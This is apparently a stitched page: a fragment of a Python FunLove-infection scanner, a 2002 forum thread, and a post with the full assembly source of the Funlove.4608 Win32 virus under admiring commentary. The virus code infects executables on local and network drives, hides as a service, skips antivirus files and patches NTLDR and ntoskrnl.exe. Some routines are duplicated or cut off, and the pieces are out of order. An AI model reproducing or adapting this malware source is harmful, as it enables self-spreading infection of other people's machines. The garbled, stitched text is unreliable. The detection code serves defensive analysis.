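    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    sect_off = e_lfanew + 0x18 + opt_size
    if opt_size < 0x14 or sect_off + nsect * 0x28 > len(data):
        return None
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]
    sections = []
    for i in range(nsect):
        off = sect_off + i * 0x28
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 0x24)[0]
        sections.append({"va": va, "vsize": vsize, "raw": rawptr, "rawsize": rawsize, "flags": flags})
    return entry_rva, sections


def scan_host(data):
    """Return the FunLove host-file indicators present in a PE image (bytes)."""
    parsed = parse_pe(data)
    if parsed is None:
        return []
    entry_rva, sections = parsed
    hits = []
    if len(data) & 0xFF == 0x03:                        # "cmp al,03" marker
        hits.append("size_mod_256_is_3")
    if sections and sections[-1]["flags"] & SECTION_FLAGS == SECTION_FLAGS:
        hits.append("last_section_8C000000")
    for s in sections:                                   # section holding the EP
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            ep_off = entry_rva - s["va"] + s["raw"]
            if data[ep_off:ep_off + 4] == EP_STUB:
                hits.append("entry_point_call_gs_stub")
            break
    return hits


def scan_system_file(data):
    """Return the names of BlownAway patches (ntoskrnl/NTLDR) present in data."""
    return [name for name, (_clean, patched) in KERNEL_PATCHES.items() if patched in data]


def build_sample(infected):
    """Constructed one-section PE32 test image (not a real binary); with
    infected=True it carries the three host markers the virus leaves."""
    e_lfanew, opt_size, entry_rva, raw_ptr = 0x40, 0xE0, 0x1000, 0x200
    img = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x10F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry_rva)          # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)           # ImageBase
    img += opt
    if infected:
        raw_size, flags = 0x200 + PHYS_VSIZE, 0x60000020 | SECTION_FLAGS
        ep_bytes = EP_STUB + struct.pack("<i", 0x1234)   # placeholder rel32
    else:
        raw_size, flags = 0x200, 0x60000020
        ep_bytes = bytes.fromhex("558BEC33C05DC390")       # push ebp; ...; ret; nop
    img += b".text\0\0\0" + struct.pack("<IIIIIIHHI", raw_size + 0x3000, entry_rva,
                                         raw_size, raw_ptr, 0, 0, 0, 0, flags)
    img += b"\0" * (raw_ptr - len(img))
    code = bytearray(raw_size)
    code[:8] = ep_bytes
    img += code
    if infected:
        img += b"\0" * 3                                   # "add edx,03": size ends in 03
    return bytes(img)
```

Feed scan_host the bytes of an .exe, .scr or .ocx and scan_system_file the bytes of ntoskrnl.exe or NTLDR; a hit from scan_system_file means the on-disk kernel or loader carries the patch and should be restored from clean media.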
Reply #1
Posted: 2002-05-28 18:58
Too long. Could you explain how it works?

Reply #2
Posted: 2002-05-28 19:00
> Too long. Could you explain how it works?

I don't have time right now to write a long, detailed analysis. There is a detailed analysis of this virus on www.symantec.com

Reply #3
Posted: 2002-05-28 21:30
If you can't analyze all of it, could you pick out one or two highlights and talk about them? :D

Reply #4
Posted: 2002-05-28 21:48
When I took assembly, my teacher took the memory-resident technique out of the Yankee virus and analyzed it for us; I thought that was pretty good.

Reply #5
Posted: 2002-05-28 21:54
> When I took assembly, my teacher took the memory-resident technique out of the Yankee virus and analyzed it for us; I thought that was pretty good.

Brother, please don't make me faint. That's a DOS virus, and not the best one either. These days it's all Win32 viruses. :o :(

Reply #6
Posted: 2002-05-28 22:00
I was just giving an example, and that is what my teacher actually did; at least I felt you could learn something that way. So you could take a section of the best code and analyze it, everyone discusses it, and we all learn from it. Wouldn't that be nice? Of course, it might take some time. :D

Reply #7
Posted: 2002-05-28 22:04
> I was just giving an example, and that is what my teacher actually did; at least I felt you could learn something that way. So you could take a section of the best code and analyze it, everyone discusses it, and we all learn from it. Wouldn't that be nice? Of course, it might take some time. :D

Brother, I really don't have time right now; I'm busy being depressed and looking for a job. :D Take a careful look at the funlove source code; it's very good. It isn't concise, but it really is a very effective virus.

Reply #8
Posted: 2002-05-28 22:07
I understand. I just found a job too and haven't even signed yet, so I know how painful job hunting is this year.
All I can do is wish you find a satisfying job soon.

Reply #9
Posted: 2002-05-28 22:09
> I understand. I just found a job too and haven't even signed yet, so I know how painful job hunting is this year.

Brother, I'm changing jobs. Even more depressing. :( :( :(

Reply #10
Posted: 2002-05-28 22:13
Sigh. I'll be depressed along with you.

Reply #11
Posted: 2002-05-28 22:18
> Sigh. I'll be depressed along with you.

No need. I hope everyone is happy.

Reply #12
Posted: 2002-05-29 10:25
;Funlove.4608 source code
;********************************************************************************************* ; 开始代码 ;********************************************************************************************* VStart: call GetDelta lea esi,[offset HostCode + ebx] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 ;重定位Kernel32 or eax,eax jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型 jnz short NT_Srv call Create9xProcess ;建立WIN9X进程 ret NT_Srv: call CreateNTService ;建立NT服务 Exit: ret ;********************************************************************************************* ;建立NT服务的子程序 ;********************************************************************************************* CreateNTService: call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; 取服务管理器的句柄 call OpenSCManagerA or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出. jz short CNT_Exit mov edi,0F01FF lea esi,offset [Service + ebx] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[offset Buffer1 + ebx] ; flcss.exe push eax push 01 ;错误代码 push 02 ; 开始 push 20 ; 类型 push edi push 00 push esi push SCM_Handle ;句柄 call CreateServiceA ;建立服务 or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA ;开始服务 or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret ;********************************************************************************************* ;建立WIN9X进程的子程序 ;********************************************************************************************* Create9xProcess: ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. 
call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[offset Buffer2 + ebx] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[offset Buffer1 + ebx] push esi push 00 call CreateProcessA ;创建进程 or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit: ret **************************************************************************** ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. **************************************************************************** CreateExecutable: lea edi,[offset Buffer1 + ebx] push edi push 104 push edi call GetSystemDirectoryA ;取得系统目录 add edi,eax mov al,\'\\\' stosb lea esi,[offset Process + ebx] movsd movsd movsd push 02 call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import mov eax,-1 stosd stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import mov eax,[edi - 8] stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; 写文件头 push 00 push esi push 1000 push ebx push c_FileHandle call WriteFile ; 写入病毒主体 push c_FileHandle call CloseHandle ;关闭文件 CE_Exit: inc eax ret ;************************************************************************************ ;以下应该是病毒的服务程序 ;************************************************************************************ VService: call GetDelta push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型 jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32 or eax,eax jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax lea ecx,[offset Service + ebx] lea edx,[offset ServiceDispatcher + ebx] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; 将控制权返回给调用者 push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx] push esi call LoadLibraryA lea esi,[offset RegisterClassA+ ebx] push esi push eax call 
GetProcAddress ;取进程的地址 or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址 lea eax,[offset Service + ebx] mov [esi + 24],eax push esi call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx] push esi push dword ptr [offset Kernel32_Base + ebx] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ;取当前进程的ID ; 注册为服务 call GetCurrentProcessId ;取当前进程的ID ; 注册为服务进程,防止被用户 push 01 ;用CTRL+ALR+DEL从任务管理器中发现 push eax call RegisterServiceProcess push 8000 ; 延时 call Sleep VS_00: call StartInfectionThread VS_Exit: ret ;********************************************************************************************* ;NT服务子程序 ;********************************************************************************************* ServiceDispatcher: call GetDelta lea esi,[offset ServiceHandler + ebx] lea edi,[offset Service + ebx] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ;告诉WINDOWS服务已经正确的运行 call SetServiceStatus push 8000 call Sleep call StartInfectionThread ;建立进程 ret ServiceHandler: ret ; 当管理员关闭服务时,提示系统出错!好东西!!! 
;********************************************************************************************* ;此子程序用于建立线程 ;********************************************************************************************* StartInfectionThread: call GetTickCount mov [offset Rand + ebx],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[offset VThread + ebx] push eax push 0 push 0 call CreateThread ret ;********************************************************************************************* ; 病毒线程 ;********************************************************************************************* VThread: call GetDelta call InfectDrives ;感染本地文件 push 60000 call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork ;感染网络文件 jmp short VThread ;******************************************************************************** ; 通过网络传染的子程序,值得借鉴 ;******************************************************************************** InfectNetwork: lea eax,[offset MPR_Name + ebx] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[offset MPR_Functions + ebx] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret ;********************************************************************************************* ; 此子程序用于测试驱动器是否有效 ;********************************************************************************************* InfectDrives: push esi call GetTickCount mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx] mov dword ptr [esi],\' \\:+ ebx - offset VStart\' ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘? jz short ID_DriveOk cmp al,04 ;网络驱动器? 
jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx] inc al mov [offset Buffer1 + ebx],al cmp al,\'Z\' jna short ID_TestDrive pop esi ret ;********************************************************************************************* ;查找计算机 ;********************************************************************************************* NetSearch : mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; 计算机名 or esi,esi jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘 jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,\'\\\' stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret ;************************************************************************************* ; 查找文件子程序,这些跟以前DOS下没什么区别, ; ; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! 
^_^ ;************************************************************************************* FileSearch: mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx] lea esi,[offset Buffer1 + ebx] push edi push esi call FindFirstFileA ;找第一个文件 cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; 测试是目录还是文件 jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],\'.\' jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,\'\\\' stosb push edi call FileSearch RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHand RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret ;******************************************************************** ;没什么新意,略过吧 ;******************************************************************** FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染 mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 ;************************************************************************ ;注意拉, ;************************************************************************ mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断 or eax,20202020 cmp eax,\' xco\' ;控件 jz short FT_02 cmp eax,\' rcs\' ;屏幕保护文件 jz short FT_02 cmp eax,\' exe\' ;标准的EXE文件 jnz short FT_Exit FT_02: mov eax,[edi + 20] ; 文件小于2000的就不感染 cmp eax,2000 jc short FT_Exit cmp al,03 ; 检测是否已经感染 jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径 lea edi,[offset Buffer3 + ebx] push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[offset Buffer2 + ebx] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile ;干活了, FT_Exit: jmp RS_Next 
;***************************************************************************************** ;感染文件子程序 ;***************************************************************************************** InfectFile: push i_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染 jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile ;********************************************************************************* ;以下的程序跟文件头有关,建议没基础者找一些相关资料看看 ;********************************************************************************* cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧 jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小 ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi] cmp eax,00004550 ;PE文件吗? jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI???? 
jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; 将ESI指向第一个节表 push esi mov eax,[edi + 28] ; 查找包含\"PE\"的节表 IN_00: mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟 ;DOS在程序和数据段上的一个重要改变 ;也是写WINDOWS病毒要注意的地方之一 pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24] cmp al,80 ; 是否已经初始化 jz IN_CloseFile or eax,8C000000 ; 将它改为可写, and eax,not 12000000 ; 不共享,不可丢弃 mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系 mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,4000 mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,4000 ; 改变虚拟大小 mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,1000 ; 改变物理大小 mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头 mov edi,edx mov ecx,2000 repz movsb lea edi,[offset HostCode + ebx] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; 设置CALL GS:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ;写入病毒主体 mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle ;关闭 
call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间 push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle ;关闭文件 IN_Exit: ret ;******************************************************************************** ; 查找GetProcAddress 的子程序 ;******************************************************************************** Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32 and eax,0FFF00000 cmp eax,0BFF00000 jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000 jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077F00000 jnz short OS_Win2K? mov edi,eax jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077E00000 jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi mov ecx,20000 WG_01: push ecx mov ecx,08 push esi push edi repz cmpsb pop edi pop esi pop ecx jz short WG_02 inc edi loop WG_01 WG_Failed: xor eax,eax jmp short WG_03 WG_02: add edi,03 mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx mov [offset Kernel32_Base + ebx],eax WG_03: ret ;*************************************************************************************** ;DLL 重定位子程序 ;*************************************************************************************** DLL_Relocate: mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret ;********************************************************************************************** ; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 ;********************************************************************************************** BlownAway: lea esi,[offset NTLDR + ebx] mov edi,DirEnd movsd movsd lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_00 
add esi,10 BA_00: push edi push esi push 05 call PatchFile lea esi,[offset NTOSKRNL + ebx] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_02 add esi,18 BA_02: push edi push esi push 09 call PatchFile ret PatchFile: push p_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle ;关闭文件 PA_Exit: ret ;********************************************************************************************** ;此子程序用于取病毒在内存中的开始地址,经典技术 ;********************************************************************************************** GetDelta: call delta delta: pop ebx sub ebx,offset delta - VStart ret ;********************************************************************************************** ;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 ;********************************************************************************************** RelocKernel32: push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[offset Kernel32_Functions + ebx] push esi call DLL_Relocate RK_00: ret ;********************************************************************************************** ; 以下是重定位Advapi32的子程序 ;********************************************************************************************** RelocAdvapi32: lea eax,[offset ADVAPI32_Name 
+ ebx] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[offset ADVAPI32_Functions + ebx] push esi call DLL_Relocate RA_00: ret ;********************************************************************************************** ; 打开文件子程序 ;********************************************************************************************** OpenFile: push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; 普通属性 push o_OpenMode push 00 push 00 ; 不共享, push 0C0000000 ; 读写方式 push o_Filename call CreateFileA ret ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileM ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret ViewMap: push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ;********************************************************************************************** ; 延时,没什么说的了 ;********************************************************************************************** Wait_A_Little: call GetTickCount sub eax,[offset Tick + ebx] cmp eax,4000 jc short WAL_00 push 16000 call Sleep call GetTickCount mov [offset Tick + ebx],eax WAL_00: ret GetRand: push ecx push edx mov eax,[offset Rand + ebx] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [offset Rand + ebx],eax pop edx pop ecx ret ;********************************************************************************************** ;以下是一些数据 ;********************************************************************************************** HostCode db 8 
dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db \'NTLDR\',0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 db 3Bh,46,58,0EBh,07 W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db \'WINNT\\System32\\ntoskrnl.exe\',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 ;********************************************************************************************** ;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, ;********************************************************************************************** SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db \'flcss.exe\',0 Service db \'FLC\',0 ; Import节表 VImports: dd offset Kernel32_Pointers dd -1,-1 dd offset Kernel32_Name dd offset Kernel32_Relocated db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep Kernel32_Relocated dd offset Kernel32_Beep Kernel32_Beep db ?,?,\'Beep\',0 ;********************************************************************************************* ; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了, ; ; 注: 绝顶高手--------没有头发的高手 ;********************************************************************************************* Kernel32_Name db \'KERNEL32.dll\',0 Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,\'CloseHandle\',0 CreateFileA: db 0B8,4 dup(?),0FF,0E0,\'CreateFileA\',0 CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,\'CreateFileMappingA\',0 CreateProcessA: db 0B8,4 dup(?),0FF,0E0,\'CreateProcessA\',0 CreateThread: db 0B8,4 dup(?),0FF,0E0,\'CreateThread\',0 FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,\'FindFirstFileA\',0 FindNextFileA: db 0B8,4 
dup(?),0FF,0E0,\'FindNextFileA\',0 FindClose: db 0B8,4 dup(?),0FF,0E0,\'FindClose\',0 GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,\'GetCurrentProcessId\',0 GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,\'GetDriveTypeA\',0 GetFileSize: db 0B8,4 dup(?),0FF,0E0,\'GetFileSize\',0 GetProcAddress: db 0B8,4 dup(?),0FF,0E0,\'GetProcAddress\',0 GetTickCount: db 0B8,4 dup(?),0FF,0E0,\'GetTickCount\',0 GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,\'GetSystemDirectoryA\',0 LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,\'LoadLibraryA\',0 MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,\'MapViewOfFile\',0 ReadFile: db 0B8,4 dup(?),0FF,0E0,\'ReadFile\',0 SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,\'SetFileAttributesA\',0 SetFileTime: db 0B8,4 dup(?),0FF,0E0,\'SetFileTime\',0 Sleep: db 0B8,4 dup(?),0FF,0E0,\'Sleep\',0 UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,\'UnmapViewOfFile\',0 VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,\'VirtualAlloc\',0 VirtualFree: db 0B8,4 dup(?),0FF,0E0,\'VirtualFree\',0 WriteFile: db 0B8,4 dup(?),0FF,0E0,\'WriteFile\',0 ;注:下面的API在WIN9X中是没有的 db 0 RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,\'RegisterServiceProcess\',0 USER32_Name db \'USER32.dll\',0 RegisterClassA: db 0B8,4 dup(?),0FF,0E0,\'RegisterClassA\',0 ADVAPI32_Name db \'ADVAPI32.dll\',0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,\'OpenSCManagerA\',0 OpenServiceA: db 0B8,4 dup(?),0FF,0E0,\'OpenServiceA\',0 CreateServiceA: db 0B8,4 dup(?),0FF,0E0,\'CreateServiceA\',0 StartServiceA: db 0B8,4 dup(?),0FF,0E0,\'StartServiceA\',0 StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,\'StartServiceCtrlDispatcherA\',0 RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,\'RegisterServiceCtrlHandlerA\',0 SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,\'SetServiceStatus\',0 MPR_Name db \'MPR.dll\',0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,\'WNetOpenEnumA\',0 WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,\'WNetEnumResourceA\',0 WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,\'WNetCloseEnum\',0 ;病毒应该是在这里就结束了 vend: 
Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; this is presumably used to hold the current directory Buffer2 db 200 dup (?) Buffer3 db 2000 dup (?) ; this holds the file that was read in CODE ENDS END main
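The FunLove listing above leaves three traces in a file it has modified: its own "already infected" test is `cmp al,03` on the low byte of the file size, InfectFile overwrites the host entry point with `90 90 65 E8` followed by a 32-bit displacement (the `mov eax,00E8659090` / `stosd` sequence, i.e. `nop; nop; call gs:rel32`), and it ORs `8C000000` into the last section's characteristics while clearing `12000000` (SHARED | DISCARDABLE). The following Python checker is an editor's added example, not part of the original post nor any vendor's scanner: it parses the PE headers, maps the entry-point RVA to a file offset through the section table and reports those indicators. The `build_sample_pe` fixture constructs a minimal two-section PE32 image purely for demonstration; its layout, sizes and the appended padding are assumptions for the test and not the real infector's output.

```python
import struct

# Indicators read off the FunLove listing above (InfectFile / FileTest).
FUNLOVE_EP_STUB = b"\x90\x90\x65\xE8"   # nop; nop; call gs:rel32, written at the host entry point
SCN_SET = 0x8C000000                     # bits ORed into the last section's characteristics
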